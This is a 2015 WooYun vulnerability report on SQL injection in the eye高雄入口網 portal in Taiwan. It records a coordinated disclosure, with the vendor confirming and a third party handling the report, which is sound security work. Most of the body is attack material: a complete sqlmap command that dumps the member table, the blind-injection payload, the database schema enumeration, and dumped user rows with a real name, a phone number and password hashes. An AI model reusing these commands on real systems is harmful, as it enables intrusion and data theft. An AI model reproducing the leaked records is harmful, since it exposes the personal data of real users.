当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157163

漏洞标题:eye高雄入口網主站存在SQL注射漏洞(1W多名用户邮箱真实姓名密码电话)(臺灣地區)

相关厂商:eye高雄入口網

漏洞作者: 路人甲

提交时间:2015-12-01 12:04

修复时间:2016-01-16 16:32

公开时间:2016-01-16 16:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

eye高雄入口網,吃喝玩樂盡在這裡,高雄商圈,美食餐廳,特色景點,捷運商圈,高雄網頁設計,人脈網聯誼活動等

详细说明:

地址:http://**.**.**.**/?p=employee&store=513&employee_id=240

$ python sqlmap.py -u "http://**.**.**.**/?p=employee&store=513&employee_id=240" -p store --technique=B --random-agent --batch --threads=10 -D formosal_lovewed -T member -C username,mobile,real_name,password,email --dump --start 1 --stop 5


Database: formosal_lovewed
+--------+---------+
| Table | Entries |
+--------+---------+
| member | 11409 |
+--------+---------+


Database: formosal_lovewed
Table: member
[5 entries]
+-----------------------+------------+-----------+----------------------------------+---------+
| username | mobile | real_name | password | email |
+-----------------------+------------+-----------+----------------------------------+---------+
| ivan@**.**.**.** | <blank> | ivan | 492736c08f74f22447eae8d35b220f02 | <blank> |
| ivan@**.**.**.** | <blank> | ivan | 492736c08f74f22447eae8d35b220f02 | <blank> |
| eling520@**.**.**.** | 0931366603 | 王妤婕 | b0df2094f49150e871278fee627a87a1 | <blank> |
| s8642050@**.**.**.** | <blank> | s8642050 | 2812afd52c2588f8d9bbfb5bb5acc7de | <blank> |
| ivan@**.**.**.** | <blank> | ivan | 492736c08f74f22447eae8d35b220f02 | <blank> |
+-----------------------+------------+-----------+----------------------------------+---------+

漏洞证明:

---
Parameter: store (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=employee&store=513 AND 1863=1863&employee_id=240
---
back-end DBMS: MySQL >= 5.0.0
current user: 'formosal_shit@localhost'
current user is DBA: False
database management system users [1]:
[*] 'formosal_shit'@'localhost'
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1372 |
| SESSION_VARIABLES | 451 |
| GLOBAL_VARIABLES | 437 |
| GLOBAL_STATUS | 341 |
| SESSION_STATUS | 341 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219 |
| COLLATIONS | 219 |
| PARTITIONS | 145 |
| TABLES | 145 |
| STATISTICS | 80 |
| KEY_COLUMN_USAGE | 52 |
| TABLE_CONSTRAINTS | 52 |
| PLUGINS | 42 |
| CHARACTER_SETS | 40 |
| INNODB_FT_DEFAULT_STOPWORD | 36 |
| SCHEMA_PRIVILEGES | 18 |
| ENGINES | 9 |
| PROCESSLIST | 4 |
| SCHEMATA | 2 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: formosal_lovewed
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| store_site_set | 22388 |
| store_permission | 21650 |
| product_self_description | 18515 |
| album_photo | 16303 |
| extend_article_category | 15862 |
| nav | 13396 |
| nav_description | 13396 |
| store_block_description | 12291 |
| member | 11409 |
| store_information_description | 9777 |
| store_block | 8119 |
| store_information | 7607 |
| market_form_ans | 6579 |
| product_attribute | 6180 |
| extend_product_category | 5815 |
| article | 4952 |
| article_description | 4952 |
| treatment_self_description | 4110 |
| product | 3734 |
| product_description | 3734 |
| extend_album_category | 3452 |
| store_category | 3285 |
| store_category_description | 3262 |
| store_askme | 2728 |
| store_askme_reply | 2616 |
| `order` | 2438 |
| store_reservation | 2269 |
| extend_store_category | 2083 |
| store_aboutus_banner | 2058 |
| product_image | 2048 |
| extend_treatment_category | 2007 |
| treatment_image | 1906 |
| cart_detail | 1436 |
| ip_record | 1411 |
| cart | 1324 |
| album | 1175 |
| album_description | 1174 |
| extend_employee_category | 1058 |
| treatment_description | 1027 |
| treatment | 1026 |
| store_description | 917 |
| store | 865 |
| store_signup | 720 |
| circle_image | 609 |
| product_attribute_value | 561 |
| store_index_banner | 542 |
| employee | 474 |
| employee_description | 474 |
| store_theme | 417 |
| order_detail | 156 |
| store_reservation_reply | 147 |
| store_member_information_tab | 145 |
| groupbuy_description | 91 |
| treatment_survey | 86 |
| circle | 83 |
| ascription | 76 |
| category | 55 |
| category_description | 55 |
| store_payment | 41 |
| store_payment_description | 41 |
| link_exchange | 29 |
| branch | 27 |
| permission | 23 |
| extend_groupbuy_category | 18 |
| market_form | 17 |
| order_reply | 15 |
| information_description | 14 |
| block | 13 |
| block_description | 13 |
| information | 13 |
| groupbuy | 12 |
| vote_board | 10 |
| theme | 9 |
| vote_member | 8 |
| it_category | 5 |
| it_category_description | 5 |
| `language` | 3 |
| payment | 3 |
| `user` | 2 |
| platform | 2 |
| store_group | 2 |
| system_set | 2 |
| user_group | 2 |
| vote | 1 |
| vote_description | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: formosal_lovewed
Table: member
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: formosal_lovewed
Table: platform
[1 column]
+----------+
| Column |
+----------+
| passqlmap resumed the following injection point(s) from stored session:
---
Parameter: store (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=employee&store=513 AND 1863=1863&employee_id=240
---
back-end DBMS: MySQL 5
Database: formosal_lovewed
+--------+---------+
| Table | Entries |
+--------+---------+
| member | 11409 |
+--------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: store (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=employee&store=513 AND 1863=1863&employee_id=240
---
back-end DBMS: MySQL 5
Database: formosal_lovewed
Table: member
[32 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| active | tinyint(4) |
| alley | varchar(20) |
| area | varchar(20) |
| birthday | date |
| code | varchar(32) |
| country | varchar(50) |
| county | varchar(20) |
| date_added | datetime |
| date_modified | datetime |
| email | varchar(255) |
| floor | varchar(20) |
| floor_hyphen | varchar(20) |
| gender | tinyint(1) |
| is_delete | tinyint(1) |
| lane | varchar(20) |
| last_login | datetime |
| member_grade | tinyint(1) |
| member_id | int(11) |
| mobile | varchar(20) |
| nickname | varchar(50) |
| num_hyphen | varchar(20) |
| number | varchar(20) |
| password | varchar(128) |
| province | varchar(50) |
| real_name | varchar(20) |
| road | varchar(20) |
| second_email | varchar(255) |
| second_tel | varchar(20) |
| store_id | int(11) |
| suite | varchar(20) |
| username | varchar(255) |
| zipcode | varchar(10) |
+---------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: store (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=employee&store=513 AND 1863=1863&employee_id=240
---
back-end DBMS: MySQL 5
Database: formosal_lovewed
Table: member
[5 entries]
+-----------------------+------------+-----------+----------------------------------+---------+
| username | mobile | real_name | password | email |
+-----------------------+------------+-----------+----------------------------------+---------+
| ivan@**.**.**.** | <blank> | ivan | 492736c08f74f22447eae8d35b220f02 | <blank> |
| ivan@**.**.**.** | <blank> | ivan | 492736c08f74f22447eae8d35b220f02 | <blank> |
| eling520@**.**.**.** | 0931366603 | 王妤婕 | b0df2094f49150e871278fee627a87a1 | <blank> |
| s8642050@**.**.**.** | <blank> | s8642050 | 2812afd52c2588f8d9bbfb5bb5acc7de | <blank> |
| ivan@**.**.**.** | <blank> | ivan | 492736c08f74f22447eae8d35b220f02 | <blank> |
+-----------------------+------------+-----------+----------------------------------+---------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-02 16:30

厂商回复:

感謝通報

最新状态:

暂无